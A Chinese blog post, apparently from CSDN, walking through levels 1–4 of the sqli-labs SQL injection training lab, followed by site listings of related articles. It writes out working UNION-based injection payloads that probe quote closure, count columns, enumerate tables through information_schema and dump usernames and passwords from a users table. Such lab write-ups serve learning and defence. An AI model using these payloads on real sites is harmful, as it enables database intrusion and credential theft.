sqli 1-4靶场闯关(sql注入)

最新推荐文章于 2024-08-14 18:37:04 发布
最新推荐文章于 2024-08-14 18:37:04 发布
阅读量80 收藏
点赞数
文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laykr/article/details/134017701
版权

第一关

先试试看是什么类型的注入

正确回显,说明不是数字型,

?id=1'

对比发现,mysql是用单引号闭合的

源代码:

成功回显,是字符型注入

那么现在开始探测列数(为了union联合查询探测做准备)

id =1 ' order by 3 --+ 其中的--+是为了过滤后面多余的',+在URL中会把解释为"空格",当然你也可以--' 来让后面的'闭合,这样也能实现一样的效果

探测到只有3列,准备用union探测有回显的列(这是为了方便我们构造payload)

可以看到2,3有回显,现在开始看版本,确定是不是mysql5.0版本以上的.

可以看到当前数据库是security,版本是5.5.53,可以用information_schema数据库了

接下来开始探测用户信息在哪里

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables
    where table_schema='security'--+

利用information_schema数据库特点探测当前数据库有什么表

知道表就可以爆字段名了,看到有users表,看看能不能爆出用户与密码

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns
    where table_name='users'--+

看到有username与password,开始爆数据

?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

爆出数据了成功

第二关

与第一关一样的探测方法,?id=1 and 1=2 没有回复,发现是数字型注入

接下来一样开始探测有多少列:

也是只有3列,与第一关一样开始用union探测哪些列是回显列

一样是2,3列,现在就可以用union探测当前数据库与数据库版本了

版本是5版本以上,可以用information_schema数据库进行探测

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables
    where table_schema='security'

看到有users表,开始爆字段

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns
    where table_name='users'

看到有username与password开始爆数据

id=-1 union select 1,group_concat(username),group_concat(password) from users

第三关

?id = 2 ' 看到下方提示,得出现在2'右边有)与',那么我们就闭合)后把多余的)和'注释掉

?id=2') --+

成功显示,继续开始找多少列

?id=2') order by 4 --+

order by 4时报错,说明只有3列,开始用union找有回显的列

?id=-2') union select 1,2,3 --+

有回显的是2与3两列,开始用union探测当前数据库与版本

?id=-2') union select 1,database(),version() --+

开始探测当前数据库有什么表

开始探测users表有什么列

?id=-2') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

与之前都一样,开始爆username与password数据

?id=-2') union select 1,group_concat(username),group_concat(password) from users --+

一样爆出了数据

第四关

鉴于前三关都是一样的思路,

第四关就不过多阐述了,经过探测第四关也是字符型注入,但是是"与)

别的思路都一样,就不多写了

shinyorb
关注
Sqlilabs靶场1-10关详解(Get请求式)
爱吃仡坨的Blog
10-16 2600
sqlilabs用到的是mysql数据库,mysql5.0以上版本自带的数据库是information_schema,其下有tables和columns两个表tables表中的table_name字段下是所有数据库存在的表名table_schema字段下是所有表名对应的数据库名。columns表中的column_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。
SQL注入——sqli-labs靶场闯关(1~5)
qq_52072846的博客
02-24 1949
Less-1 Error Based- String 1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询 2.接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符注入 3.输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入 4.接着使用order by 语句判断,该表中一共有几列数据 order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。 5.将id=1改为一...
Sql-labs靶场(1~28)
xhx836161547的博客
12-29 5225
sql注入经典靶场Sql-labs全关详解,正在加急更新中
sqli-lib靶场1-15关通关教程
m0_56109788的博客
04-25 1279
sqli-lib靶场1-15关通关教程
Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 2238
本文章主要是关于sqli-labs靶场1-20关的通关方法
sqli-labs 靶场闯关基础准备、学习步骤、SQL注入类型,常用基本函数、获取数据库元数据
Superstacks超全栈
06-03 2510
Sqli-labs是一个用于学习和练习SQL注入漏洞的开源应用程序。它提供了一系列的漏洞场景和练习环境,帮助用户了解和实践SQL注入漏洞的利用技术。它提供了多个不同的漏洞场景,每个场景都代表了一个特定类型的SQL注入漏洞。 用户可以通过攻击这些场景来学习和实践漏洞利用技术,以及相应的修复和防御措施。 Sqli-labs还提供了详细的漏洞说明和解决方案,帮助用户理解漏洞的原理、影响和防御方法。Sqli-labs是一个用于学习和练习SQL注入漏洞的开源应用程序。它提供了一系列的漏洞场景和练习环境,帮助用户了
sqli-labs-master靶场[超详细通关教程,通关攻略~!]
muyuchen110的博客
07-22 1954
sqli-labs-master[超详细通关教程,通关攻略~!](附解题思路及各注入方法解析)-------持续更新关卡通关教程!!!!
sqli-labs靶场通关攻略(1-75)
shw_yzh的博客
08-14 1041
sqli-labs靶场超级细通关攻略
sqli-lib64关闯关笔记学习资料.zip
08-22
sqli-labs-1-65閫氬叧鏁欑▼share(by sm0nk).md》这个文件很可能包含了作者sm0nk在完成sqli-lib64所有65关的过程中所记录的笔记和技巧。通过阅读这份文档,你可以了解到每个关卡的关键思路、解题方法以及可能遇到...
sqli-labs-master靶场第二关详解
tangtang_888的博客
07-06 1830
1、点击进入sqli-labs-master靶场第二关Less-2 2、输入?id=1' and '1'='1,回显不正常,说明此处为数字型注入 3、依次输入?id=1 order by (1,2,3,4)--+,在输入4时出现报错,说明字段数为3
Sqli-labs-master靶场安装及Less-1闯关步骤
tangtang_888的博客
06-30 1475
Sqli-labs-master靶场安装1、将下载好的sqli-labs-master压缩包解压到phpstudy的网站根目录中(可以适当缩短文件名用来方便访问) 2、修改sql-connections文件夹中的配置文件db-creds.inc,将用户名和密码改为自己PHPstudy中mysql数据库的用户名和密码。 3、在浏览器中输入127.0.0.1/sqli-labs(此处sqli-labs为自己设置的文件夹名称)访问sqli-labs靶场并点击Setup/reset Database for lab
sqli-labs第五关sql注入流程
qq_33598708的博客
03-30 5796
正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/less-5/?id=1' and 1=2 根据报错可以知道是字符注入,使用 ' 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相关的数据。 所以这关的重点是盲注。 http://127.0.0.1/sqli-labs-master/less-5/?id=
靶场系列:sqllibs安装、sqli-labs靶场搭建以及闯关(1-22关)
weixin_54626591的博客
12-05 2978
sqllibs安装、sqli-labs靶场搭建以及闯关(1-22关)
卡通风格化魔法术技能粒子特效 :Toon Projectiles 2 1.0
10-19
这款卡通射击特效资源包提供了 15 种独特的射击物、命中效果和闪光效果,风格统一且易于与您的项目集成。它默认支持 Unity 的内置渲染器,并且兼容 HDRP 和 URP 渲染管线。如果您拥有 Hovl Studio 的其他资源,该包将免费提供。所有效果均在各平台兼容,并且可以通过标准尺寸值轻松调整命中效果的大小。需要注意的是,调整射击物大小时,可能需要修改轨迹长度和按距离生成的速率。 该资源还包含了一个演示场景射击脚本,方便用户快速了解如何使用这些特效。该资源包还与 InfinityPBR 的 Projectile Factory 插件兼容,可以进一步增强您的射击游戏效果。 需要注意的是,推广媒体中使用的后处理效果 "Bloom" 并非资源包自带,建议用户在下载资源包之前,先行从 Unity 包管理器下载 "Post Processing Stack"。HDRP 和 URP 渲染管线的用户可以直接利用内置的 "Volume" 组件中的 "Bloom" 效果。
在 MATLAB GUI 中动态更新数据:策略与实践
10-19
通过本文的详细介绍,你应该能够理解如何在 MATLAB GUI 中更新数据。从设计 GUI 界面到处理用户输入,再到动态更新数据,每一步都是构建交互式 MATLAB 应用程序的关键。通过实际的代码示例,你可以更深入地理解这些概念,并将其应用到你自己的项目中。 记住,GUI 的设计和实现是一个迭代的过程。随着你对用户需求的更深入了解,你可能需要不断调整和优化你的 GUI。通过持续的测试和反馈,你可以创建一个既美观又功能强大的 MATLAB GUI 应用程序
【JCR一区级】Matlab实现白鹭群优化算法ESOA-CNN-BiLSTM-Attention的故障诊断算法研究.rar
最新发布
10-20
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
信创实验室建设方案(24页).pptx
10-19
信创实验室建设方案(24页)
KGBrowserSetup-x86-V1.0.0.100-20190315.exe
10-19
KGBrowserSetup_x86_V1.0.0.100_20190315.exe
obspy-1.2.2-cp38-cp38-win_amd64.whl
10-19
obspy-1.2.2-cp38-cp38-win_amd64.whl
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值